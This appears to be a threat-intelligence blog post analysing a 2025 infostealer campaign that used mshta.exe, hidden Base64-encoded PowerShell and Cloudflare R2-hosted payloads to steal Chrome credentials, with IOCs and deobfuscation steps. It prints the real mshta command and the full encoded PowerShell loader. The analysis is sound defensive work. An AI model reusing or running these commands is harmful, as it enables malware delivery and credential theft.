• Home
  • Threat Intelligence
  • Case Study: Real-World Infostealer Attack via mshta.exe, Cloudflare R2, and Obfuscated PowerShell

In May 2025, we observed and investigated a targeted malware campaign that utilized native Windows utilities (mshta.exepowershell.exe), publicly hosted payloads on Cloudflare R2, and layered obfuscation to evade detection. The threat actor delivered an infostealer that attempted to extract saved browser credentials from a Chromium-based profile.

This article offers a complete breakdown of how the attack unfolded, the indicators it left behind, and exactly how we deobfuscated the script to understand its execution flow.

The Attack Chain

The infection began with the user visiting a set of suspicious domains:

  • partnerbcgame[.]com
  • myvantage.getitquickly[.]biz
  • A fake two-factor authentication page at: https://657.s3.fr-par.scw.cloud

Shortly after, mshta.exe was invoked to run remote code:

mshta.exe "hxxps://2no[.]co/2Od3Q3"

This URL served an obfuscated script that downloaded and executed a PowerShell payload, which in turn fetched a malicious ZIP file from Cloudflare’s R2 service.

Stage-by-Stage Breakdown

Stage 1 – mshta and PowerShell Launcher

The core command observed was:
powershell.exe -w h -nop -ep un -E JABHAEkASABSAFMAaQBPAD0AJwAqADkAKgA1ADcAOAAqADgANwAvAC8ANwAvAC8ANwAwADcAMwAzAEEAMgBGADIARgA3ADAANwA1ACoAMgAyAEQAMwAyADMALwAvADMAMAAzADgAMwAqACoAMwAzADgAMwA1ADMAOQAqADUAKgAvAC8AMwA5ADMALwAvACoALwAvADMAKgAzADIAMwA4ACoAMgAzADkAMwAxADMAMQAqAC8ALwAqADUAKgAyACoAMQAzACoAMwAzADMALwAvADMAMAAzADEAKgAxACoAMgAyAEUANwAyADMAMgAyAEUAKgAvAC8AKgA1ADcAKgAyAEYAKgAxACoAKgAqADMAMgBFADcAQQAqADkANwAwADIALwAvADcAQQAqADkANwAwADMARAAyADIAMgAvAC8AKgA1ACoARQA3ACoAMwBBADUALwAvAC8ALwA1AC8ALwBEADUAMAA1AEMAKgAxACoAKgAqADMAMgBFADcAQQAqADkANwAwADIAMgAzAEIAMgAwADIALwAvACoALwAvACoANQA3ADMANwAvAC8AMwBEAC8ALwBBACoARgAqADkAKgBFADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8AKgA1ACoARQA3ACoAMwBBADUALwAvAC8ALwA1AC8ALwBEADUAMAAyADAAMgA4ADIAMgAqADEAKgAqACoAMwA1AEYAMgAyADIAMAAyAEIAMgAwADUAQgAqADcANwA1ACoAOQAqAC8ALwA1AEQAMwBBADMAQQAvAC8ARQAqADUANwA3AC8ALwA3ADcANQAqADkAKgAvAC8AMgA4ADIAOQAyADkAMwBCADIAMAAvAC8ANQA3ADgANwAwACoAMQAqAEUAKgAvAC8AMgBEAC8ALwAxADcAMgAqADMAKgA4ACoAOQA3ACoAKgA1ADIAMAAyAEQANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvADcAQQAqADkANwAwADIAMAAyAEQALwAvAC8ALwAqADUANwAzADcALwAvACoAOQAqAEUAKgAxADcALwAvACoAOQAqAEYAKgBFADUAMAAqADEANwAvAC8AKgA4ADIAMAAyAC8ALwAqAC8ALwAqADUANwAzADcALwAvADMAQgAyADAANQAzADcALwAvACoAMQA3ADIANwAvAC8AMgBEADUAMAA3ADIAKgBGACoAMwAqADUANwAzADcAMwAyADAAMgBEAC8ALwAqACoAOQAqAEMAKgA1ADUAMAAqADEANwAvAC8AKgA4ADIAMAAyADgALwAvAEEAKgBGACoAOQAqAEUAMgBEADUAMAAqADEANwAvAC8AKgA4ADIAMAAyAC8ALwAqAC8ALwAqADUANwAzADcALwAvADIAMAAyADIALwAvADEALwAvACoAMwAxADIARQAqADUANwA4ACoANQAyADIAMgA5ADMAQgAyAC8ALwAqADUAKgAxADUANwA1ADAALwAvADkANQAwADIAMAAzAEQAMgAwADIALwAvACoANQAqAEUANwAqADMAQQA1AC8ALwAqADUAKgBEADcAMAAzAEIAKgAqADcANQAqAEUAKgAzADcALwAvACoAOQAqAEYAKgBFADIAMAA3ADcALwAvACoANQAwADcAKgAqAC8ALwAvAC8AMwAqAEEALwAvADIAKgBFADIAOAAyAC8ALwAqADkALwAvACoANwA1AC8ALwBDACoAMQA1AEEALwAvAEUALwAvADkAKgBGADIAQwAyADAAMgAvAC8ALwAvADEALwAvACoALwAvADEAKgA1AC8ALwBGAC8ALwA5ADIAOQA3AEIAKgAzADcANQA3ADIAKgBDADIAMAAyAC8ALwAqADkALwAvACoANwA1AC8ALwBDACoAMQA1AEEALwAvAEUALwAvADkAKgBGADIAMAAyAEQAKgBGADIAMAAyAC8ALwAvAC8AMQAvAC8AKgAvAC8AMQAqADUALwAvAEYALwAvADkANwBEADMAQgAqACoANwA1ACoARQAqADMANwAvAC8AKgA5ACoARgAqAEUAMgAwAC8ALwBGACoAQwA3ADgANQA5ADcAMwAqADEANwA4ADIAOAAyAC8ALwAvAC8ANwAvAC8AOQAvAC8AOAA1ADIANQAzACoAOQAvAC8ARgAyADkANwBCADcANwAvAC8AKgA1ADAANwAqACoALwAvAC8ALwAzACoAQQAvAC8AMgAqAEUAMgAwADIALwAvAC8ALwA3AC8ALwA5AC8ALwA4ADUAMgA1ADMAKgA5AC8ALwBGADIAMAAyAC8ALwAvAC8AMQAvAC8AKgAvAC8AMQAqADUALwAvAEYALwAvADkANwBEADIALwAvAC8ALwAxAC8ALwAqAC8ALwAxACoANQAvAC8ARgAvAC8AOQAyADAAMwBEADIAMAAyAC8ALwAqADUAKgBFADcAKgAzAEEANQAvAC8AKgA1ACoARAA3ADAAMgAwADIAQgAyADAAMgA3ADUAQwAqADEAKgAqACoAMwAyAEUANwBBACoAOQA3ADAAMgA3ADMAQgAvAC8ARgAqAEMANwA4ADUAOQA3ADMAKgAxADcAOAAyADAAMgAvAC8ALwAvADMANQAwADUAMwA3ADIAMgBFADUAMwA3ADUAKgAyADUAMwA3AC8ALwA3ADIAKgA5ACoARQAqADcAMgA4ADMAMwAyAEMAMwA1ADMAOQAyADkAMwBCAC8ALwA1ADcAOAA3ADAAKgAxACoARQAqAC8ALwAyAEQALwAvADEANwAyACoAMwAqADgAKgA5ADcAKgAqADUAMgAwADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8ALwAvADEALwAvACoALwAvADEAKgA1AC8ALwBGAC8ALwA5ADIAMAAyAEQALwAvAC8ALwAqADUANwAzADcALwAvACoAOQAqAEUAKgAxADcALwAvACoAOQAqAEYAKgBFADUAMAAqADEANwAvAC8AKgA4ADIAMAAyAC8ALwAqADUAKgAxADUANwA1ADAALwAvADkANQAwADMAQgAvAC8AMQAqAC8ALwAqAC8ALwAyAEQANQAvAC8ANwA5ADcAMAAqADUAMgAwADIARAAvAC8AMQA3ADMANwAzACoANQAqAEQAKgAyACoAQwA3ADkAMgAwADUAMwA3ADkANwAzADcALwAvACoANQAqAEQAMgBFAC8ALwA5AC8ALwBGADIARQAvAC8AMwAqAEYAKgBEADcAMAA3ADIAKgA1ADcAMwA3ADMAKgA5ACoARgAqAEUAMgBFAC8ALwAqACoAOQAqAEMAKgA1ADUAMwA3ADkANwAzADcALwAvACoANQAqAEQAMwBCADIALwAvAC8ALwBBADUAOQAqADMAKgAzACoAOQAvAC8ARQAyADAAMwBEADIAMAA1AEIALwAvADkALwAvAEYAMgBFAC8ALwAzACoARgAqAEQANwAwADcAMgAqADUANwAzADcAMwAqADkAKgBGACoARQAyAEUANQBBACoAOQA3ADAALwAvACoAKgA5ACoAQwAqADUANQBEADMAQQAzAEEALwAvAEYANwAwACoANQAqAEUANQAyACoANQAqADEAKgAvAC8AMgA4ADIALwAvAC8ALwAxAC8ALwAqAC8ALwAxACoANQAvAC8ARgAvAC8AOQAyADkAMwBCADIALwAvADUAMgAvAC8ARQAqAEYAKgAqACoARAAyADAAMwBEADIAOAAyAC8ALwAvAC8AQQA1ADkAKgAzACoAMwAqADkALwAvAEUAMgBFAC8ALwA1ACoARQA3AC8ALwA3ADIAKgA5ACoANQA3ADMAMgAwADcAQwAyADAANQAzACoARgA3ADIANwAvAC8AMgBEAC8ALwBGACoAMgAqAEEAKgA1ACoAMwA3AC8ALwAyADAALwAvAEUAKgAxACoARAAqADUAMgAwADcAQwAyADAANQAzACoANQAqAEMAKgA1ACoAMwA3AC8ALwAyAEQALwAvAEYAKgAyACoAQQAqADUAKgAzADcALwAvADIAMAAyAEQALwAvACoAKgA5ADcAMgA3ADMANwAvAC8AMgAwADMAMQAyADkAMgBFAC8ALwBFACoAMQAqAEQAKgA1ADMAQgAyAC8ALwAqAEQALwAvADIANQAzADcANwAyADAAMwBEADIAMAAvAC8AQQAqAEYAKgA5ACoARQAyAEQANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvACoANQAqAEUANwAqADMAQQA1AC8ALwAqADUAKgBEADcAMAAyADAAMgAvAC8ANQAyAC8ALwBFACoARgAqACoAKgBEADMAQgA3ADMANwAvAC8AKgAxADcAMgA3AC8ALwAyADAAMgAvAC8AKgBEAC8ALwAyADUAMwA3ADcAMgAwADMAQgAzAEIAJwAuAFIAZQBwAGwAYQBjAGUAKAAiAC8ALwAiACwAIAAiADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADYAIgApADsAJABDAFAAUwByAD0AKAAkAEcASQBIAFIAUwBpAE8AIAAtAHMAcABsAGkAdAAgACcAKAA/ADwAPQBcAEcALgAuACkAJwB8ACUAewBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABfACwAMQA2ACkAKQB9ACkAIAAtAGoAbwBpAG4AIAAnACcAOwAgACYAIAAkAEMAUABTAHIALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAzACkAIAAkAEMAUABTAHIA

This wrapper tells PowerShell to:

  • Run hidden (-w h)
  • Skip profile loading (-nop)
  • Bypass execution policy (-ep Unrestricted)
  • Execute the payload as a Base64-encoded UTF-16LE string

Stage 2 – Final Payload (Live Payload Download and Execution)

Key Observations

  • Payload Hosting: Cloudflare R2 (*.r2.dev)
  • Initial Download: afc.zip (SHA1: 5ceb5281b941699aacc2ea347494863cff583adf)
  • Executed Binary: AF1.exe
  • Credential Access: PowerShell accessed Login Data and Web Data from the user’s Chrome profile
  • Redundant Logic: Re-download and re-extract to ensure execution even if the first method fails

Indicators of Compromise (IOCs)

TypeValue
Commandhxxps[:]//pub-24086c859ed94d628b911deba63401ab.r2[.]dev/afc.zip
Dropped Filesafc.zipAF1.exedeci.comIconX.dll
Temp Paths%TEMP%\afc.zip%TEMP%\afc_<GUID>\AF1.exe
Suspicious Domains2no[.]coblameaowi[.]run
IPs104[.]21.79.229162[.]159.140.237104[.]21.70.113
PowerShell Variables$GIHRSiO$CPSr

Our Deobfuscation Process

  1. Decode Base64:
    • [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("<blob>"))
  2. Replace Obfuscation Markers:
    • $s = $GIHRSiO.Replace(“//”,”4″).Replace(“*”,”6″)
  3. Convert Hex to String:
    • $bytes = -split $s -ne ” | ForEach-Object { [Convert]::ToByte($_,16) }
    • $decoded = [Text.Encoding]::UTF8.GetString($bytes)
  4. Identify Execution:
    • & $CPSr.Substring(0,3) $CPSr # Executes as: iex $CPSr
  5. Extract IOCs and Evaluate Behavior
    • We never run iex in production. Instead, we analyze decoded strings offline or in a sandbox to extract URLs, file names, and hashes.

Defender Takeaways

  • This attack did not require a vulnerability—just a user click.
  • Native Windows binaries (mshta.exepowershell.exe) were weaponized.
  • The final payload was publicly hosted and delivered via HTTPS, evading basic detection.
  • Obfuscation was effective but straightforward to reverse if you follow a layered decoding strategy.

If you’d like access to our decoded scripts, a YARA rule for detection, or assistance extracting more IOCs, feel free to contact our team.

Stay vigilant.

Share this post

Subscribe to our newsletter

Keep up with the latest blog posts by staying updated. No spamming: we promise.
By clicking Sign Up you’re confirming that you agree with our Terms and Conditions.

Related posts